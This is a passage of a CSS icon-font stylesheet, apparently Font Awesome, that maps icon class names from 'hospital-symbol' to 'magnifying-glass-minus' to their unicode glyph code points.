content: "\f47e"; } .fa-hospital-symbol::before { content: "\f47e"; } .fa-circle-half-stroke::before { content: "\f042"; } .fa-adjust::before { content: "\f042"; } .fa-circle-info::before { content: "\f05a"; } .fa-info-circle::before { content: "\f05a"; } .fa-circle-left::before { content: "\f359"; } .fa-arrow-alt-circle-left::before { content: "\f359"; } .fa-circle-minus::before { content: "\f056"; } .fa-minus-circle::before { content: "\f056"; } .fa-circle-nodes::before { content: "\e4e2"; } .fa-circle-notch::before { content: "\f1ce"; } .fa-circle-pause::before { content: "\f28b"; } .fa-pause-circle::before { content: "\f28b"; } .fa-circle-play::before { content: "\f144"; } .fa-play-circle::before { content: "\f144"; } .fa-circle-plus::before { content: "\f055"; } .fa-plus-circle::before { content: "\f055"; } .fa-circle-question::before { content: "\f059"; } .fa-question-circle::before { content: "\f059"; } .fa-circle-radiation::before { content: "\f7ba"; } .fa-radiation-alt::before { content: "\f7ba"; } .fa-circle-right::before { content: "\f35a"; } .fa-arrow-alt-circle-right::before { content: "\f35a"; } .fa-circle-stop::before { content: "\f28d"; } .fa-stop-circle::before { content: "\f28d"; } .fa-circle-up::before { content: "\f35b"; } .fa-arrow-alt-circle-up::before { content: "\f35b"; } .fa-circle-user::before { content: "\f2bd"; } .fa-user-circle::before { content: "\f2bd"; } .fa-circle-xmark::before { content: "\f057"; } .fa-times-circle::before { content: "\f057"; } .fa-xmark-circle::before { content: "\f057"; } .fa-city::before { content: "\f64f"; } .fa-clapperboard::before { content: "\e131"; } .fa-clipboard::before { content: "\f328"; } .fa-clipboard-check::before { content: "\f46c"; } .fa-clipboard-list::before { content: "\f46d"; } .fa-clipboard-question::before { content: "\e4e3"; } .fa-clipboard-user::before { content: "\f7f3"; } .fa-clock::before { content: "\f017"; } .fa-clock-four::before { content: "\f017"; } .fa-clock-rotate-left::before { content: "\f1da"; } .fa-history::before { content: "\f1da"; } .fa-clone::before { content: "\f24d"; } .fa-closed-captioning::before { content: "\f20a"; } .fa-cloud::before { content: "\f0c2"; } .fa-cloud-arrow-down::before { content: "\f0ed"; } .fa-cloud-download::before { content: "\f0ed"; } .fa-cloud-download-alt::before { content: "\f0ed"; } .fa-cloud-arrow-up::before { content: "\f0ee"; } .fa-cloud-upload::before { content: "\f0ee"; } .fa-cloud-upload-alt::before { content: "\f0ee"; } .fa-cloud-bolt::before { content: "\f76c"; } .fa-thunderstorm::before { content: "\f76c"; } .fa-cloud-meatball::before { content: "\f73b"; } .fa-cloud-moon::before { content: "\f6c3"; } .fa-cloud-moon-rain::before { content: "\f73c"; } .fa-cloud-rain::before { content: "\f73d"; } .fa-cloud-showers-heavy::before { content: "\f740"; } .fa-cloud-showers-water::before { content: "\e4e4"; } .fa-cloud-sun::before { content: "\f6c4"; } .fa-cloud-sun-rain::before { content: "\f743"; } .fa-clover::before { content: "\e139"; } .fa-code::before { content: "\f121"; } .fa-code-branch::before { content: "\f126"; } .fa-code-commit::before { content: "\f386"; } .fa-code-compare::before { content: "\e13a"; } .fa-code-fork::before { content: "\e13b"; } .fa-code-merge::before { content: "\f387"; } .fa-code-pull-request::before { content: "\e13c"; } .fa-coins::before { content: "\f51e"; } .fa-colon-sign::before { content: "\e140"; } .fa-comment::before { content: "\f075"; } .fa-comment-dollar::before { content: "\f651"; } .fa-comment-dots::before { content: "\f4ad"; } .fa-commenting::before { content: "\f4ad"; } .fa-comment-medical::before { content: "\f7f5"; } .fa-comment-slash::before { content: "\f4b3"; } .fa-comment-sms::before { content: "\f7cd"; } .fa-sms::before { content: "\f7cd"; } .fa-comments::before { content: "\f086"; } .fa-comments-dollar::before { content: "\f653"; } .fa-compact-disc::before { content: "\f51f"; } .fa-compass::before { content: "\f14e"; } .fa-compass-drafting::before { content: "\f568"; } .fa-drafting-compass::before { content: "\f568"; } .fa-compress::before { content: "\f066"; } .fa-computer::before { content: "\e4e5"; } .fa-computer-mouse::before { content: "\f8cc"; } .fa-mouse::before { content: "\f8cc"; } .fa-cookie::before { content: "\f563"; } .fa-cookie-bite::before { content: "\f564"; } .fa-copy::before { content: "\f0c5"; } .fa-copyright::before { content: "\f1f9"; } .fa-couch::before { content: "\f4b8"; } .fa-cow::before { content: "\f6c8"; } .fa-credit-card::before { content: "\f09d"; } .fa-credit-card-alt::before { content: "\f09d"; } .fa-crop::before { content: "\f125"; } .fa-crop-simple::before { content: "\f565"; } .fa-crop-alt::before { content: "\f565"; } .fa-cross::before { content: "\f654"; } .fa-crosshairs::before { content: "\f05b"; } .fa-crow::before { content: "\f520"; } .fa-crown::before { content: "\f521"; } .fa-crutch::before { content: "\f7f7"; } .fa-cruzeiro-sign::before { content: "\e152"; } .fa-cube::before { content: "\f1b2"; } .fa-cubes::before { content: "\f1b3"; } .fa-cubes-stacked::before { content: "\e4e6"; } .fa-d::before { content: "\44"; } .fa-database::before { content: "\f1c0"; } .fa-delete-left::before { content: "\f55a"; } .fa-backspace::before { content: "\f55a"; } .fa-democrat::before { content: "\f747"; } .fa-desktop::before { content: "\f390"; } .fa-desktop-alt::before { content: "\f390"; } .fa-dharmachakra::before { content: "\f655"; } .fa-diagram-next::before { content: "\e476"; } .fa-diagram-predecessor::before { content: "\e477"; } .fa-diagram-project::before { content: "\f542"; } .fa-project-diagram::before { content: "\f542"; } .fa-diagram-successor::before { content: "\e47a"; } .fa-diamond::before { content: "\f219"; } .fa-diamond-turn-right::before { content: "\f5eb"; } .fa-directions::before { content: "\f5eb"; } .fa-dice::before { content: "\f522"; } .fa-dice-d20::before { content: "\f6cf"; } .fa-dice-d6::before { content: "\f6d1"; } .fa-dice-five::before { content: "\f523"; } .fa-dice-four::before { content: "\f524"; } .fa-dice-one::before { content: "\f525"; } .fa-dice-six::before { content: "\f526"; } .fa-dice-three::before { content: "\f527"; } .fa-dice-two::before { content: "\f528"; } .fa-disease::before { content: "\f7fa"; } .fa-display::before { content: "\e163"; } .fa-divide::before { content: "\f529"; } .fa-dna::before { content: "\f471"; } .fa-dog::before { content: "\f6d3"; } .fa-dollar-sign::before { content: "\24"; } .fa-dollar::before { content: "\24"; } .fa-usd::before { content: "\24"; } .fa-dolly::before { content: "\f472"; } .fa-dolly-box::before { content: "\f472"; } .fa-dong-sign::before { content: "\e169"; } .fa-door-closed::before { content: "\f52a"; } .fa-door-open::before { content: "\f52b"; } .fa-dove::before { content: "\f4ba"; } .fa-down-left-and-up-right-to-center::before { content: "\f422"; } .fa-compress-alt::before { content: "\f422"; } .fa-down-long::before { content: "\f309"; } .fa-long-arrow-alt-down::before { content: "\f309"; } .fa-download::before { content: "\f019"; } .fa-dragon::before { content: "\f6d5"; } .fa-draw-polygon::before { content: "\f5ee"; } .fa-droplet::before { content: "\f043"; } .fa-tint::before { content: "\f043"; } .fa-droplet-slash::before { content: "\f5c7"; } .fa-tint-slash::before { content: "\f5c7"; } .fa-drum::before { content: "\f569"; } .fa-drum-steelpan::before { content: "\f56a"; } .fa-drumstick-bite::before { content: "\f6d7"; } .fa-dumbbell::before { content: "\f44b"; } .fa-dumpster::before { content: "\f793"; } .fa-dumpster-fire::before { content: "\f794"; } .fa-dungeon::before { content: "\f6d9"; } .fa-e::before { content: "\45"; } .fa-ear-deaf::before { content: "\f2a4"; } .fa-deaf::before { content: "\f2a4"; } .fa-deafness::before { content: "\f2a4"; } .fa-hard-of-hearing::before { content: "\f2a4"; } .fa-ear-listen::before { content: "\f2a2"; } .fa-assistive-listening-systems::before { content: "\f2a2"; } .fa-earth-africa::before { content: "\f57c"; } .fa-globe-africa::before { content: "\f57c"; } .fa-earth-americas::before { content: "\f57d"; } .fa-earth::before { content: "\f57d"; } .fa-earth-america::before { content: "\f57d"; } .fa-globe-americas::before { content: "\f57d"; } .fa-earth-asia::before { content: "\f57e"; } .fa-globe-asia::before { content: "\f57e"; } .fa-earth-europe::before { content: "\f7a2"; } .fa-globe-europe::before { content: "\f7a2"; } .fa-earth-oceania::before { content: "\e47b"; } .fa-globe-oceania::before { content: "\e47b"; } .fa-egg::before { content: "\f7fb"; } .fa-eject::before { content: "\f052"; } .fa-elevator::before { content: "\e16d"; } .fa-ellipsis::before { content: "\f141"; } .fa-ellipsis-h::before { content: "\f141"; } .fa-ellipsis-vertical::before { content: "\f142"; } .fa-ellipsis-v::before { content: "\f142"; } .fa-envelope::before { content: "\f0e0"; } .fa-envelope-circle-check::before { content: "\e4e8"; } .fa-envelope-open::before { content: "\f2b6"; } .fa-envelope-open-text::before { content: "\f658"; } .fa-envelopes-bulk::before { content: "\f674"; } .fa-mail-bulk::before { content: "\f674"; } .fa-equals::before { content: "\3d"; } .fa-eraser::before { content: "\f12d"; } .fa-ethernet::before { content: "\f796"; } .fa-euro-sign::before { content: "\f153"; } .fa-eur::before { content: "\f153"; } .fa-euro::before { content: "\f153"; } .fa-exclamation::before { content: "\21"; } .fa-expand::before { content: "\f065"; } .fa-explosion::before { content: "\e4e9"; } .fa-eye::before { content: "\f06e"; } .fa-eye-dropper::before { content: "\f1fb"; } .fa-eye-dropper-empty::before { content: "\f1fb"; } .fa-eyedropper::before { content: "\f1fb"; } .fa-eye-low-vision::before { content: "\f2a8"; } .fa-low-vision::before { content: "\f2a8"; } .fa-eye-slash::before { content: "\f070"; } .fa-f::before { content: "\46"; } .fa-face-angry::before { content: "\f556"; } .fa-angry::before { content: "\f556"; } .fa-face-dizzy::before { content: "\f567"; } .fa-dizzy::before { content: "\f567"; } .fa-face-flushed::before { content: "\f579"; } .fa-flushed::before { content: "\f579"; } .fa-face-frown::before { content: "\f119"; } .fa-frown::before { content: "\f119"; } .fa-face-frown-open::before { content: "\f57a"; } .fa-frown-open::before { content: "\f57a"; } .fa-face-grimace::before { content: "\f57f"; } .fa-grimace::before { content: "\f57f"; } .fa-face-grin::before { content: "\f580"; } .fa-grin::before { content: "\f580"; } .fa-face-grin-beam::before { content: "\f582"; } .fa-grin-beam::before { content: "\f582"; } .fa-face-grin-beam-sweat::before { content: "\f583"; } .fa-grin-beam-sweat::before { content: "\f583"; } .fa-face-grin-hearts::before { content: "\f584"; } .fa-grin-hearts::before { content: "\f584"; } .fa-face-grin-squint::before { content: "\f585"; } .fa-grin-squint::before { content: "\f585"; } .fa-face-grin-squint-tears::before { content: "\f586"; } .fa-grin-squint-tears::before { content: "\f586"; } .fa-face-grin-stars::before { content: "\f587"; } .fa-grin-stars::before { content: "\f587"; } .fa-face-grin-tears::before { content: "\f588"; } .fa-grin-tears::before { content: "\f588"; } .fa-face-grin-tongue::before { content: "\f589"; } .fa-grin-tongue::before { content: "\f589"; } .fa-face-grin-tongue-squint::before { content: "\f58a"; } .fa-grin-tongue-squint::before { content: "\f58a"; } .fa-face-grin-tongue-wink::before { content: "\f58b"; } .fa-grin-tongue-wink::before { content: "\f58b"; } .fa-face-grin-wide::before { content: "\f581"; } .fa-grin-alt::before { content: "\f581"; } .fa-face-grin-wink::before { content: "\f58c"; } .fa-grin-wink::before { content: "\f58c"; } .fa-face-kiss::before { content: "\f596"; } .fa-kiss::before { content: "\f596"; } .fa-face-kiss-beam::before { content: "\f597"; } .fa-kiss-beam::before { content: "\f597"; } .fa-face-kiss-wink-heart::before { content: "\f598"; } .fa-kiss-wink-heart::before { content: "\f598"; } .fa-face-laugh::before { content: "\f599"; } .fa-laugh::before { content: "\f599"; } .fa-face-laugh-beam::before { content: "\f59a"; } .fa-laugh-beam::before { content: "\f59a"; } .fa-face-laugh-squint::before { content: "\f59b"; } .fa-laugh-squint::before { content: "\f59b"; } .fa-face-laugh-wink::before { content: "\f59c"; } .fa-laugh-wink::before { content: "\f59c"; } .fa-face-meh::before { content: "\f11a"; } .fa-meh::before { content: "\f11a"; } .fa-face-meh-blank::before { content: "\f5a4"; } .fa-meh-blank::before { content: "\f5a4"; } .fa-face-rolling-eyes::before { content: "\f5a5"; } .fa-meh-rolling-eyes::before { content: "\f5a5"; } .fa-face-sad-cry::before { content: "\f5b3"; } .fa-sad-cry::before { content: "\f5b3"; } .fa-face-sad-tear::before { content: "\f5b4"; } .fa-sad-tear::before { content: "\f5b4"; } .fa-face-smile::before { content: "\f118"; } .fa-smile::before { content: "\f118"; } .fa-face-smile-beam::before { content: "\f5b8"; } .fa-smile-beam::before { content: "\f5b8"; } .fa-face-smile-wink::before { content: "\f4da"; } .fa-smile-wink::before { content: "\f4da"; } .fa-face-surprise::before { content: "\f5c2"; } .fa-surprise::before { content: "\f5c2"; } .fa-face-tired::before { content: "\f5c8"; } .fa-tired::before { content: "\f5c8"; } .fa-fan::before { content: "\f863"; } .fa-faucet::before { content: "\e005"; } .fa-faucet-drip::before { content: "\e006"; } .fa-fax::before { content: "\f1ac"; } .fa-feather::before { content: "\f52d"; } .fa-feather-pointed::before { content: "\f56b"; } .fa-feather-alt::before { content: "\f56b"; } .fa-ferry::before { content: "\e4ea"; } .fa-file::before { content: "\f15b"; } .fa-file-arrow-down::before { content: "\f56d"; } .fa-file-download::before { content: "\f56d"; } .fa-file-arrow-up::before { content: "\f574"; } .fa-file-upload::before { content: "\f574"; } .fa-file-audio::before { content: "\f1c7"; } .fa-file-circle-check::before { content: "\e493"; } .fa-file-circle-exclamation::before { content: "\e4eb"; } .fa-file-circle-minus::before { content: "\e4ed"; } .fa-file-circle-plus::before { content: "\e4ee"; } .fa-file-circle-question::before { content: "\e4ef"; } .fa-file-circle-xmark::before { content: "\e494"; } .fa-file-code::before { content: "\f1c9"; } .fa-file-contract::before { content: "\f56c"; } .fa-file-csv::before { content: "\f6dd"; } .fa-file-excel::before { content: "\f1c3"; } .fa-file-export::before { content: "\f56e"; } .fa-arrow-right-from-file::before { content: "\f56e"; } .fa-file-image::before { content: "\f1c5"; } .fa-file-import::before { content: "\f56f"; } .fa-arrow-right-to-file::before { content: "\f56f"; } .fa-file-invoice::before { content: "\f570"; } .fa-file-invoice-dollar::before { content: "\f571"; } .fa-file-lines::before { content: "\f15c"; } .fa-file-alt::before { content: "\f15c"; } .fa-file-text::before { content: "\f15c"; } .fa-file-medical::before { content: "\f477"; } .fa-file-pdf::before { content: "\f1c1"; } .fa-file-pen::before { content: "\f31c"; } .fa-file-edit::before { content: "\f31c"; } .fa-file-powerpoint::before { content: "\f1c4"; } .fa-file-prescription::before { content: "\f572"; } .fa-file-shield::before { content: "\e4f0"; } .fa-file-signature::before { content: "\f573"; } .fa-file-video::before { content: "\f1c8"; } .fa-file-waveform::before { content: "\f478"; } .fa-file-medical-alt::before { content: "\f478"; } .fa-file-word::before { content: "\f1c2"; } .fa-file-zipper::before { content: "\f1c6"; } .fa-file-archive::before { content: "\f1c6"; } .fa-fill::before { content: "\f575"; } .fa-fill-drip::before { content: "\f576"; } .fa-film::before { content: "\f008"; } .fa-filter::before { content: "\f0b0"; } .fa-filter-circle-dollar::before { content: "\f662"; } .fa-funnel-dollar::before { content: "\f662"; } .fa-filter-circle-xmark::before { content: "\e17b"; } .fa-fingerprint::before { content: "\f577"; } .fa-fire::before { content: "\f06d"; } .fa-fire-burner::before { content: "\e4f1"; } .fa-fire-extinguisher::before { content: "\f134"; } .fa-fire-flame-curved::before { content: "\f7e4"; } .fa-fire-alt::before { content: "\f7e4"; } .fa-fire-flame-simple::before { content: "\f46a"; } .fa-burn::before { content: "\f46a"; } .fa-fish::before { content: "\f578"; } .fa-fish-fins::before { content: "\e4f2"; } .fa-flag::before { content: "\f024"; } .fa-flag-checkered::before { content: "\f11e"; } .fa-flag-usa::before { content: "\f74d"; } .fa-flask::before { content: "\f0c3"; } .fa-flask-vial::before { content: "\e4f3"; } .fa-floppy-disk::before { content: "\f0c7"; } .fa-save::before { content: "\f0c7"; } .fa-florin-sign::before { content: "\e184"; } .fa-folder::before { content: "\f07b"; } .fa-folder-blank::before { content: "\f07b"; } .fa-folder-closed::before { content: "\e185"; } .fa-folder-minus::before { content: "\f65d"; } .fa-folder-open::before { content: "\f07c"; } .fa-folder-plus::before { content: "\f65e"; } .fa-folder-tree::before { content: "\f802"; } .fa-font::before { content: "\f031"; } .fa-football::before { content: "\f44e"; } .fa-football-ball::before { content: "\f44e"; } .fa-forward::before { content: "\f04e"; } .fa-forward-fast::before { content: "\f050"; } .fa-fast-forward::before { content: "\f050"; } .fa-forward-step::before { content: "\f051"; } .fa-step-forward::before { content: "\f051"; } .fa-franc-sign::before { content: "\e18f"; } .fa-frog::before { content: "\f52e"; } .fa-futbol::before { content: "\f1e3"; } .fa-futbol-ball::before { content: "\f1e3"; } .fa-soccer-ball::before { content: "\f1e3"; } .fa-g::before { content: "\47"; } .fa-gamepad::before { content: "\f11b"; } .fa-gas-pump::before { content: "\f52f"; } .fa-gauge::before { content: "\f624"; } .fa-dashboard::before { content: "\f624"; } .fa-gauge-med::before { content: "\f624"; } .fa-tachometer-alt-average::before { content: "\f624"; } .fa-gauge-high::before { content: "\f625"; } .fa-tachometer-alt::before { content: "\f625"; } .fa-tachometer-alt-fast::before { content: "\f625"; } .fa-gauge-simple::before { content: "\f629"; } .fa-gauge-simple-med::before { content: "\f629"; } .fa-tachometer-average::before { content: "\f629"; } .fa-gauge-simple-high::before { content: "\f62a"; } .fa-tachometer::before { content: "\f62a"; } .fa-tachometer-fast::before { content: "\f62a"; } .fa-gavel::before { content: "\f0e3"; } .fa-legal::before { content: "\f0e3"; } .fa-gear::before { content: "\f013"; } .fa-cog::before { content: "\f013"; } .fa-gears::before { content: "\f085"; } .fa-cogs::before { content: "\f085"; } .fa-gem::before { content: "\f3a5"; } .fa-genderless::before { content: "\f22d"; } .fa-ghost::before { content: "\f6e2"; } .fa-gift::before { content: "\f06b"; } .fa-gifts::before { content: "\f79c"; } .fa-glass-water::before { content: "\e4f4"; } .fa-glass-water-droplet::before { content: "\e4f5"; } .fa-glasses::before { content: "\f530"; } .fa-globe::before { content: "\f0ac"; } .fa-golf-ball-tee::before { content: "\f450"; } .fa-golf-ball::before { content: "\f450"; } .fa-gopuram::before { content: "\f664"; } .fa-graduation-cap::before { content: "\f19d"; } .fa-mortar-board::before { content: "\f19d"; } .fa-greater-than::before { content: "\3e"; } .fa-greater-than-equal::before { content: "\f532"; } .fa-grip::before { content: "\f58d"; } .fa-grip-horizontal::before { content: "\f58d"; } .fa-grip-lines::before { content: "\f7a4"; } .fa-grip-lines-vertical::before { content: "\f7a5"; } .fa-grip-vertical::before { content: "\f58e"; } .fa-group-arrows-rotate::before { content: "\e4f6"; } .fa-guarani-sign::before { content: "\e19a"; } .fa-guitar::before { content: "\f7a6"; } .fa-gun::before { content: "\e19b"; } .fa-h::before { content: "\48"; } .fa-hammer::before { content: "\f6e3"; } .fa-hamsa::before { content: "\f665"; } .fa-hand::before { content: "\f256"; } .fa-hand-paper::before { content: "\f256"; } .fa-hand-back-fist::before { content: "\f255"; } .fa-hand-rock::before { content: "\f255"; } .fa-hand-dots::before { content: "\f461"; } .fa-allergies::before { content: "\f461"; } .fa-hand-fist::before { content: "\f6de"; } .fa-fist-raised::before { content: "\f6de"; } .fa-hand-holding::before { content: "\f4bd"; } .fa-hand-holding-dollar::before { content: "\f4c0"; } .fa-hand-holding-usd::before { content: "\f4c0"; } .fa-hand-holding-droplet::before { content: "\f4c1"; } .fa-hand-holding-water::before { content: "\f4c1"; } .fa-hand-holding-hand::before { content: "\e4f7"; } .fa-hand-holding-heart::before { content: "\f4be"; } .fa-hand-holding-medical::before { content: "\e05c"; } .fa-hand-lizard::before { content: "\f258"; } .fa-hand-middle-finger::before { content: "\f806"; } .fa-hand-peace::before { content: "\f25b"; } .fa-hand-point-down::before { content: "\f0a7"; } .fa-hand-point-left::before { content: "\f0a5"; } .fa-hand-point-right::before { content: "\f0a4"; } .fa-hand-point-up::before { content: "\f0a6"; } .fa-hand-pointer::before { content: "\f25a"; } .fa-hand-scissors::before { content: "\f257"; } .fa-hand-sparkles::before { content: "\e05d"; } .fa-hand-spock::before { content: "\f259"; } .fa-handcuffs::before { content: "\e4f8"; } .fa-hands::before { content: "\f2a7"; } .fa-sign-language::before { content: "\f2a7"; } .fa-signing::before { content: "\f2a7"; } .fa-hands-asl-interpreting::before { content: "\f2a3"; } .fa-american-sign-language-interpreting::before { content: "\f2a3"; } .fa-asl-interpreting::before { content: "\f2a3"; } .fa-hands-american-sign-language-interpreting::before { content: "\f2a3"; } .fa-hands-bound::before { content: "\e4f9"; } .fa-hands-bubbles::before { content: "\e05e"; } .fa-hands-wash::before { content: "\e05e"; } .fa-hands-clapping::before { content: "\e1a8"; } .fa-hands-holding::before { content: "\f4c2"; } .fa-hands-holding-child::before { content: "\e4fa"; } .fa-hands-holding-circle::before { content: "\e4fb"; } .fa-hands-praying::before { content: "\f684"; } .fa-praying-hands::before { content: "\f684"; } .fa-handshake::before { content: "\f2b5"; } .fa-handshake-angle::before { content: "\f4c4"; } .fa-hands-helping::before { content: "\f4c4"; } .fa-handshake-simple::before { content: "\f4c6"; } .fa-handshake-alt::before { content: "\f4c6"; } .fa-handshake-simple-slash::before { content: "\e05f"; } .fa-handshake-alt-slash::before { content: "\e05f"; } .fa-handshake-slash::before { content: "\e060"; } .fa-hanukiah::before { content: "\f6e6"; } .fa-hard-drive::before { content: "\f0a0"; } .fa-hdd::before { content: "\f0a0"; } .fa-hashtag::before { content: "\23"; } .fa-hat-cowboy::before { content: "\f8c0"; } .fa-hat-cowboy-side::before { content: "\f8c1"; } .fa-hat-wizard::before { content: "\f6e8"; } .fa-head-side-cough::before { content: "\e061"; } .fa-head-side-cough-slash::before { content: "\e062"; } .fa-head-side-mask::before { content: "\e063"; } .fa-head-side-virus::before { content: "\e064"; } .fa-heading::before { content: "\f1dc"; } .fa-header::before { content: "\f1dc"; } .fa-headphones::before { content: "\f025"; } .fa-headphones-simple::before { content: "\f58f"; } .fa-headphones-alt::before { content: "\f58f"; } .fa-headset::before { content: "\f590"; } .fa-heart::before { content: "\f004"; } .fa-heart-circle-bolt::before { content: "\e4fc"; } .fa-heart-circle-check::before { content: "\e4fd"; } .fa-heart-circle-exclamation::before { content: "\e4fe"; } .fa-heart-circle-minus::before { content: "\e4ff"; } .fa-heart-circle-plus::before { content: "\e500"; } .fa-heart-circle-xmark::before { content: "\e501"; } .fa-heart-crack::before { content: "\f7a9"; } .fa-heart-broken::before { content: "\f7a9"; } .fa-heart-pulse::before { content: "\f21e"; } .fa-heartbeat::before { content: "\f21e"; } .fa-helicopter::before { content: "\f533"; } .fa-helicopter-symbol::before { content: "\e502"; } .fa-helmet-safety::before { content: "\f807"; } .fa-hard-hat::before { content: "\f807"; } .fa-hat-hard::before { content: "\f807"; } .fa-helmet-un::before { content: "\e503"; } .fa-highlighter::before { content: "\f591"; } .fa-hill-avalanche::before { content: "\e507"; } .fa-hill-rockslide::before { content: "\e508"; } .fa-hippo::before { content: "\f6ed"; } .fa-hockey-puck::before { content: "\f453"; } .fa-holly-berry::before { content: "\f7aa"; } .fa-horse::before { content: "\f6f0"; } .fa-horse-head::before { content: "\f7ab"; } .fa-hospital::before { content: "\f0f8"; } .fa-hospital-alt::before { content: "\f0f8"; } .fa-hospital-wide::before { content: "\f0f8"; } .fa-hospital-user::before { content: "\f80d"; } .fa-hot-tub-person::before { content: "\f593"; } .fa-hot-tub::before { content: "\f593"; } .fa-hotdog::before { content: "\f80f"; } .fa-hotel::before { content: "\f594"; } .fa-hourglass::before { content: "\f254"; } .fa-hourglass-2::before { content: "\f254"; } .fa-hourglass-half::before { content: "\f254"; } .fa-hourglass-empty::before { content: "\f252"; } .fa-hourglass-end::before { content: "\f253"; } .fa-hourglass-3::before { content: "\f253"; } .fa-hourglass-start::before { content: "\f251"; } .fa-hourglass-1::before { content: "\f251"; } .fa-house::before { content: "\f015"; } .fa-home::before { content: "\f015"; } .fa-home-alt::before { content: "\f015"; } .fa-home-lg-alt::before { content: "\f015"; } .fa-house-chimney::before { content: "\e3af"; } .fa-home-lg::before { content: "\e3af"; } .fa-house-chimney-crack::before { content: "\f6f1"; } .fa-house-damage::before { content: "\f6f1"; } .fa-house-chimney-medical::before { content: "\f7f2"; } .fa-clinic-medical::before { content: "\f7f2"; } .fa-house-chimney-user::before { content: "\e065"; } .fa-house-chimney-window::before { content: "\e00d"; } .fa-house-circle-check::before { content: "\e509"; } .fa-house-circle-exclamation::before { content: "\e50a"; } .fa-house-circle-xmark::before { content: "\e50b"; } .fa-house-crack::before { content: "\e3b1"; } .fa-house-fire::before { content: "\e50c"; } .fa-house-flag::before { content: "\e50d"; } .fa-house-flood-water::before { content: "\e50e"; } .fa-house-flood-water-circle-arrow-right::before { content: "\e50f"; } .fa-house-laptop::before { content: "\e066"; } .fa-laptop-house::before { content: "\e066"; } .fa-house-lock::before { content: "\e510"; } .fa-house-medical::before { content: "\e3b2"; } .fa-house-medical-circle-check::before { content: "\e511"; } .fa-house-medical-circle-exclamation::before { content: "\e512"; } .fa-house-medical-circle-xmark::before { content: "\e513"; } .fa-house-medical-flag::before { content: "\e514"; } .fa-house-signal::before { content: "\e012"; } .fa-house-tsunami::before { content: "\e515"; } .fa-house-user::before { content: "\e1b0"; } .fa-home-user::before { content: "\e1b0"; } .fa-hryvnia-sign::before { content: "\f6f2"; } .fa-hryvnia::before { content: "\f6f2"; } .fa-hurricane::before { content: "\f751"; } .fa-i::before { content: "\49"; } .fa-i-cursor::before { content: "\f246"; } .fa-ice-cream::before { content: "\f810"; } .fa-icicles::before { content: "\f7ad"; } .fa-icons::before { content: "\f86d"; } .fa-heart-music-camera-bolt::before { content: "\f86d"; } .fa-id-badge::before { content: "\f2c1"; } .fa-id-card::before { content: "\f2c2"; } .fa-drivers-license::before { content: "\f2c2"; } .fa-id-card-clip::before { content: "\f47f"; } .fa-id-card-alt::before { content: "\f47f"; } .fa-igloo::before { content: "\f7ae"; } .fa-image::before { content: "\f03e"; } .fa-image-portrait::before { content: "\f3e0"; } .fa-portrait::before { content: "\f3e0"; } .fa-images::before { content: "\f302"; } .fa-inbox::before { content: "\f01c"; } .fa-indent::before { content: "\f03c"; } .fa-indian-rupee-sign::before { content: "\e1bc"; } .fa-indian-rupee::before { content: "\e1bc"; } .fa-inr::before { content: "\e1bc"; } .fa-industry::before { content: "\f275"; } .fa-infinity::before { content: "\f534"; } .fa-info::before { content: "\f129"; } .fa-italic::before { content: "\f033"; } .fa-j::before { content: "\4a"; } .fa-jar::before { content: "\e516"; } .fa-jar-wheat::before { content: "\e517"; } .fa-jedi::before { content: "\f669"; } .fa-jet-fighter::before { content: "\f0fb"; } .fa-fighter-jet::before { content: "\f0fb"; } .fa-jet-fighter-up::before { content: "\e518"; } .fa-joint::before { content: "\f595"; } .fa-jug-detergent::before { content: "\e519"; } .fa-k::before { content: "\4b"; } .fa-kaaba::before { content: "\f66b"; } .fa-key::before { content: "\f084"; } .fa-keyboard::before { content: "\f11c"; } .fa-khanda::before { content: "\f66d"; } .fa-kip-sign::before { content: "\e1c4"; } .fa-kit-medical::before { content: "\f479"; } .fa-first-aid::before { content: "\f479"; } .fa-kitchen-set::before { content: "\e51a"; } .fa-kiwi-bird::before { content: "\f535"; } .fa-l::before { content: "\4c"; } .fa-land-mine-on::before { content: "\e51b"; } .fa-landmark::before { content: "\f66f"; } .fa-landmark-dome::before { content: "\f752"; } .fa-landmark-alt::before { content: "\f752"; } .fa-landmark-flag::before { content: "\e51c"; } .fa-language::before { content: "\f1ab"; } .fa-laptop::before { content: "\f109"; } .fa-laptop-code::before { content: "\f5fc"; } .fa-laptop-file::before { content: "\e51d"; } .fa-laptop-medical::before { content: "\f812"; } .fa-lari-sign::before { content: "\e1c8"; } .fa-layer-group::before { content: "\f5fd"; } .fa-leaf::before { content: "\f06c"; } .fa-left-long::before { content: "\f30a"; } .fa-long-arrow-alt-left::before { content: "\f30a"; } .fa-left-right::before { content: "\f337"; } .fa-arrows-alt-h::before { content: "\f337"; } .fa-lemon::before { content: "\f094"; } .fa-less-than::before { content: "\3c"; } .fa-less-than-equal::before { content: "\f537"; } .fa-life-ring::before { content: "\f1cd"; } .fa-lightbulb::before { content: "\f0eb"; } .fa-lines-leaning::before { content: "\e51e"; } .fa-link::before { content: "\f0c1"; } .fa-chain::before { content: "\f0c1"; } .fa-link-slash::before { content: "\f127"; } .fa-chain-broken::before { content: "\f127"; } .fa-chain-slash::before { content: "\f127"; } .fa-unlink::before { content: "\f127"; } .fa-lira-sign::before { content: "\f195"; } .fa-list::before { content: "\f03a"; } .fa-list-squares::before { content: "\f03a"; } .fa-list-check::before { content: "\f0ae"; } .fa-tasks::before { content: "\f0ae"; } .fa-list-ol::before { content: "\f0cb"; } .fa-list-1-2::before { content: "\f0cb"; } .fa-list-numeric::before { content: "\f0cb"; } .fa-list-ul::before { content: "\f0ca"; } .fa-list-dots::before { content: "\f0ca"; } .fa-litecoin-sign::before { content: "\e1d3"; } .fa-location-arrow::before { content: "\f124"; } .fa-location-crosshairs::before { content: "\f601"; } .fa-location::before { content: "\f601"; } .fa-location-dot::before { content: "\f3c5"; } .fa-map-marker-alt::before { content: "\f3c5"; } .fa-location-pin::before { content: "\f041"; } .fa-map-marker::before { content: "\f041"; } .fa-location-pin-lock::before { content: "\e51f"; } .fa-lock::before { content: "\f023"; } .fa-lock-open::before { content: "\f3c1"; } .fa-locust::before { content: "\e520"; } .fa-lungs::before { content: "\f604"; } .fa-lungs-virus::before { content: "\e067"; } .fa-m::before { content: "\4d"; } .fa-magnet::before { content: "\f076"; } .fa-magnifying-glass::before { content: "\f002"; } .fa-search::before { content: "\f002"; } .fa-magnifying-glass-arrow-right::before { content: "\e521"; } .fa-magnifying-glass-chart::before { content: "\e522"; } .fa-magnifying-glass-dollar::before { content: "\f688"; } .fa-search-dollar::before { content: "\f688"; } .fa-magnifying-glass-location::before { content: "\f689"; } .fa-search-location::before { content: "\f689"; } .fa-magnifying-glass-minus::before { content: "\f010"; } .fa-search-minus::before { content: "\f010"; } 